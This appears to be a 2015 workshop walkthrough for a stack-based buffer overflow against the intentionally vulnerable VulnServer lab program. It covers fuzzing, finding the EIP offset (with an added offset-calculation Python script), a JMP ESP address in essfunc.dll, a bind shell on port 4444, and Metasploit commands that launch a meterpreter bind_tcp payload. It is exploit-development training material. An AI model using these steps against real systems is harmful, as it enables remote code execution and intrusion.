joemccray

Quick Stack Based Buffer Overflow For Tim

Oct 28th, 2015
#############################################
# Quick Stack Based Buffer Overflow For Tim #
#############################################

- You can download everything you need for this exercise (except netcat) from the link below
https://s3.amazonaws.com/StrategicSec-Files/SimpleExploitLab.zip

- Extract this zip file to your Desktop

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:
nc localhost 9999

- In the new command prompt window where you ran nc, type:
HELP

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option "Edit with Notepad++"

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note which command it crashed on and the number of As that caused the crash.

- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note which command it crashed on and the number of As that caused the crash.

- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (0x41).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulnserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py
- In the previous script we saw that EIP was overwritten with 396F4338. Read in memory order (x86 is little-endian) those four bytes are 38 ('8'), 43 ('C'), 6F ('o'), 39 ('9'),
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it

5-2006char-eip-check.py
- In this script we check that our calculation of the distance to EIP is correct by overwriting EIP with 42424242
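
The arithmetic behind steps 3 to 5 (generate the nonrepeating string, turn the debugger's EIP value back into the bytes that hit the stack, search for them, then confirm the distance with a BBBB marker), as an added Python example. This is not one of the lab's scripts, which are not reproduced in this paste. It assumes the lab's 3-3000chars.py sends the Metasploit-style Aa0Aa1... pattern; under that assumption the crash value 396F4338 resolves to an offset of 2006, which agrees with the name of 5-2006char-eip-check.py. Nothing here touches the network; it only reproduces the calculation so you can check your own numbers against the debugger.

```python
import string
import struct


# Metasploit-style non-repeating pattern (Aa0Aa1...Aa9Ab0...). Assumption: the
# lab's 3-3000chars.py sends this same pattern; the 2006 in the name of
# 5-2006char-eip-check.py agrees with the offset this code computes.
def cyclic_pattern(length):
    """Return the first `length` characters of the Aa0Aa1... pattern."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]  # pattern space exhausted (20280 chars)


def register_to_memory_bytes(reg_hex):
    """OllyDBG shows EIP as a 32-bit number (e.g. '396F4338'). x86 is
    little-endian, so the bytes actually written to the stack are the
    reverse: 38 43 6F 39, i.e. the text '8Co9'."""
    return struct.pack("<I", int(reg_hex, 16)).decode("latin-1")


def find_eip_offset(pattern, reg_hex):
    """Distance from the start of the buffer to the 4 bytes that land in EIP.
    Raises if the marker is absent (EIP was not overwritten by our data) or
    ambiguous (the pattern was long enough to repeat)."""
    needle = register_to_memory_bytes(reg_hex)
    first = pattern.find(needle)
    if first == -1:
        raise ValueError("EIP value %s not found in pattern" % reg_hex)
    if pattern.find(needle, first + 1) != -1:
        raise ValueError("EIP value %s occurs more than once; use a shorter pattern" % reg_hex)
    return first


def eip_check_buffer(offset, marker=b"BBBB"):
    """Step 5 buffer: `offset` bytes of filler, then the 4-byte marker that
    should show up in EIP (BBBB reads as 42424242 in the debugger)."""
    return b"A" * offset + marker


def eip_from_buffer(buf, offset):
    """Simulate what the debugger would display: the 4 bytes at `offset`,
    interpreted as a little-endian DWORD, rendered as hex."""
    return "%08X" % struct.unpack_from("<I", buf, offset)[0]


if __name__ == "__main__":
    pattern = cyclic_pattern(3000)
    offset = find_eip_offset(pattern, "396F4338")  # crash value from step 3
    print("offset to EIP:", offset)                 # 2006
    check = eip_check_buffer(offset)
    print("EIP after step 5 would read:", eip_from_buffer(check, offset))  # 42424242
```

If find_eip_offset raises, the EIP value you typed was not produced by the pattern (the overwrite came from somewhere else, or the debugger showed a stale register), which is worth knowing before moving on to step 6.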

6-jmp-esp.py
- In this script we overwrite EIP with the address of a JMP ESP (6250AF11) inside essfunc.dll

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it on your Ubuntu host via SCP, or copy the code and paste it into a file on the host.


------------------------------

cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc

vi vulnserv.rb (paste the code into this file)


cd ~/toolz/metasploit

./msfconsole


use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.88.129
set RPORT 9999
exploit